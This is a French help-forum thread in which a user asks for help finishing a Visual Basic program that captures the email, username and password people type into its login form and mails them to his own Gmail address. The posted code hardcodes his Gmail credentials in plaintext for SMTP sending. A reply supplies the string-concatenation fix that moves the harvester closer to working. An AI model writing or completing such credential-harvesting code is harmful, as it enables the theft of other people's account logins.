Problème de codage microsoft visual basic
Résolu
fragcodeur
Messages postés
19
Membre
Dernière intervention
-
fragcodeur Messages postés 19 Date d'inscription Statut Membre Dernière intervention -
fragcodeur Messages postés 19 Date d'inscription Statut Membre Dernière intervention -
bonsoir, je fais un petit logiciel sympa.le design de l'application est fait mais , je n'arrive pas à trouver le code permettant de recevoir par mail les information de connexion que les gens ont utilisé.
par exemple : je me connecte à ce logiciel , je rentre mon email:test@test.com je rentre mon identifiant : fragcodeur et je rentre enfin mon mot de passe : jemaime.
maintenant j'aimerais recevoir ces informations de connexion sur MON adresse email.
j'ai reussi a faire en sorte de recevoir un mail mais n'arrive pas a recevoir les informations.
voici mon codage:
par exemple : je me connecte à ce logiciel , je rentre mon email:test@test.com je rentre mon identifiant : fragcodeur et je rentre enfin mon mot de passe : jemaime.
maintenant j'aimerais recevoir ces informations de connexion sur MON adresse email.
j'ai reussi a faire en sorte de recevoir un mail mais n'arrive pas a recevoir les informations.
voici mon codage:
Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim nom = tbnom
Dim pass = tbpass
Dim mail = tbmail
CEST ICI QUE JAIMERAIS METTRE MON CODE POUR RECEVOIR MOT DE PASSE MAIL ET IDENTIFIANTS.
Dim MyMailMessage As New MailMessage()
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
MyMailMessage.From = New MailAddress("fragmenteurlol@gmail.com")
MyMailMessage.To.Add("fragmenteurlol@gmail.com")
MyMailMessage.Subject = ("nouvelle connexion")
MyMailMessage.Body = ("message")
SMTPServer.Port = ("587") 'Port
SMTPServer.Credentials = New System.Net.NetworkCredential("fragmenteurlol@gmail.com", "ferrari458JW")
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage) 'Envoi
End Sub
End Class
A voir également:
- Problème de codage microsoft visual basic
- Microsoft office - Guide
- Microsoft money - Télécharger - Comptabilité & Facturation
- Codage ascii - Guide
- Cette technique secrète permet d'avoir Windows et Microsoft Office gratuitement et à vie - Accueil - Bureautique
- Microsoft 365 basic - Accueil - Microsoft Office
c'est la première ligne qui pose problème. le logiciel me dit : l'operateur '&' n'est pas defini pour les types 'strings'.
Essaye + au lieu de &